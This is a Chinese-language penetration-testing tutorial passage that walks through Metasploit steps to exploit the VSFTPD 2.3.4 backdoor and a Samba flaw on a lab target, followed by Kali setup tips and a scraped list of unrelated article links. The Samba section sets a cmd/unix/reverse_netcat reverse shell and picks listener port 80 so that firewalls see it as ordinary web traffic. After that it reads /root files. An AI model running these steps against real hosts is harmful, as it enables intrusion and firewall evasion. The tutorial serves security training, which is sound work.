8.FTP后门命令执行----Samba命令执行----VMware安装kali----多终端显示
FTP后门命令执行
再次声明,最近听闻不得教受工具使用等言论。
我敢打包票,网络空间安全一级学科的老师和学生是不会说这句话的。未知攻,焉知防。
有工具来检测自己和玩弄它,是幸运的。
犯罪者不会给你提供任何的漏洞利用工具让你玩弄。
他们的工具里面包含的漏洞是自己研发出来的。
因此,您所有看得见的工具都是用于安全的学习和培养安全性人才而使用的,是最低级别的技术。
如果这样的工具和教程都能够对公司和国家构成危害的话,那么犯罪者就更加的可以肆无忌惮的发布攻击。
我们的工具学习和掌握如同在学小学一年级,犯罪者使用的工具是大学级别。
工具都不让发布和用于教学,还谈什么国家安全,拿什么认知和技能去防御真正的攻击。
metasploit是rapid7开发的 www.rapid7.com
它是一个大型漏洞利用数据库,可以创造属于自己的漏洞
为了安全性检测,利用它和修补漏洞
parrot:msfconsole
help
use show set exploit
谷歌 rapid7 进入 vulnerability & Exploit Database 查询 VSFTPD v2.3.4 Backdoor Command Execution
use 复制粘贴模块名字
show options
set RHOST 靶机IP
show options
exploit
uname -r uname -a ls
Samba命令执行
谷歌 rapid7 进入 vulnerability & Exploit Database 查询到zenmap对应的samba模块 获取模块的信息
samba服务器运行它没有后门
唯一的方式是利用缓冲区溢出,使用有效载荷
use 复制粘贴模块名字
options
set RHOST 靶机ip
clear
show payloads
选择 cmd/unix/reverse_netcat 复制
set payload 复制粘贴
options
设置自己的监听端口为80,靶机访问80端口防火墙会认为它在访问网站,让可疑程度降低
如果反向连接出来的端口是一个奇怪的数字,防火墙会阻止这个连接,说这个可疑
set LHOST 本机IP
exploit
uname -a ls cd /root ls cat vnc.log
VMware安装kali
pureVPN赞助
从桌面光盘进去把VMware Tools拿到桌面解压 进去后右键运行终端
perl vmware-install.pl
一切配置默认,注销后生效
多终端显示
apt-get install terminator
打开terminator
top
namp
右键选择垂直分开
多终端显示
8.FTP后门命令执行----Samba命令执行----VMware安装kali----多终端显示的更多相关文章
- 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时
使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...
- salt常用命令、模块、执行
一.salt常用命令 salt 该命令执行salt的执行模块,通常在master端运行,也是我们最常用到的命令 salt [options] '<target>' <function ...
- [转帖]linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令
linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令 https://binwaer.com/post/12.html yun install -y screen ...
- 渗透技巧——如何逃逸Linux的受限制shell执行任意命令
导语:本文介绍了如何在受限制的shell中执行任意命令,实现交互.其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时,由于当前shell的限制,很多命令不能执行,导致后续的渗透 ...
- ansible使用临时命令通过模块来执行任务
使用临时命令通过模块来执行任务 一.查看系统上安装的所有模块 ansible-doc -l 查看ping模块帮助文档 ansible-doc ping 1.ansible模块 文件模块: copy:将 ...
- 【每日一linux命令2】命令执行顺序:
二.命令顺序: 若在 shell 内置的命令/bin 以及/usr/bin 之下都出现了命令 pwd,那当我们执行该命令时,会执行哪 一个?答案是第一优先执行 shell 内置的命令,再执行路 ...
- 在程序中执行shell命令
在linux系统下的操作中我们会经常用到shell命令来进行,一开始学习进程的时候对于shell命令也进行了思考,认为shell命令就是一个进程的外壳,经过了后来的学习对于这一点也有了更多的认识. 用 ...
- Linux远程执行Shell命令或脚本
## 远程执行shell命令 ssh [user]@[server] '[command]' # eg. ssh root@192.168.1.1 'uptime' ## 远程执行本地shell脚本 ...
- 解决idea中执行maven命令失败的问题
1.问题描述 如上图所示,在使用idea 里的maven命令执行项目打包时,有时候会报如下一个错误. -Dmaven.multiModuleProjectDirectory system proper ...
随机推荐
- 前后台入门系统搭建详解(springboot+angularjs)
1 . 搭建boot启动框架,这一步骤什么都不用添加,搭建完后框架如下: 2.因为是前后台项目,所以一般是需要有前台页面的,需要在后端maven依赖中加入web依赖包 spring-boot-star ...
- 【视频点播最佳实践】使用OSS SDK上传视频到点播
摘要: 场景 点播上传SDK缺乏需要的语言版本(如C/C++.Go等)或相应的功能(如网络流上传.追加上传),可以直接使用OSS的SDK进行上传. 准备工作 确认已开通点播服务并完成了相关配置.确认已 ...
- css不常见属性之pointer-events
MDN 上介绍为 CSS 属性指定在什么情况下 (如果有) 某个特定的图形元素可以成为鼠标事件的 target.pointer-events 属性值有: /* Keyword values */ po ...
- Spring、SpringMVC注解方式整合
1 原理 Web容器在启动的时候,会扫描每个jar包下的META-INF/services/javax.servlet.ServletContainerInitializer文件. 加载META-IN ...
- Python之常用模二(时间、序列号等等)
一.time模块 表示时间的三种方式: 时间戳:数字(计算机能认识的) 时间字符串:t='2012-12-12' 结构化时间:time.struct_time(tm_year=2017, tm_mon ...
- HDU-3416-MarriageMatch4(最大流,最短路)
链接: https://vjudge.net/problem/HDU-3416 题意: Do not sincere non-interference. Like that show, now sta ...
- delphi回调函数高级应用
用法一 Type TProc=procedure() of object; procedure Callback(proc:TProc); begin ... end; procedure mypro ...
- Ubuntu ssh秘钥生成
一,秘钥生成传送 ssh-keygen 选项: -b:指定密钥长度: -e:读取openssh的私钥或者公钥文件: -C:添加注释: -f:指定用来保存密钥的文件名: -i:读取未加密的ssh-v2兼 ...
- (66)Nginx+lua+Redis开发
一. 概述 Nginx是一个高性能,支持高并发的,轻量级的web服务器.目前,Apache依然web服务器中的老大,但是在全球前1000大的web服务器中,Nginx的份额为22.4%.Nginx采用 ...
- Spotlight_on_linux 安装和监控
一.下载 下载并安装 Spotlight_on_linux 二.建立连接 注意:用户名不能使用root连接,需要自己创建个用户root权限的用户 1.useradd xiaoxitest 2.p ...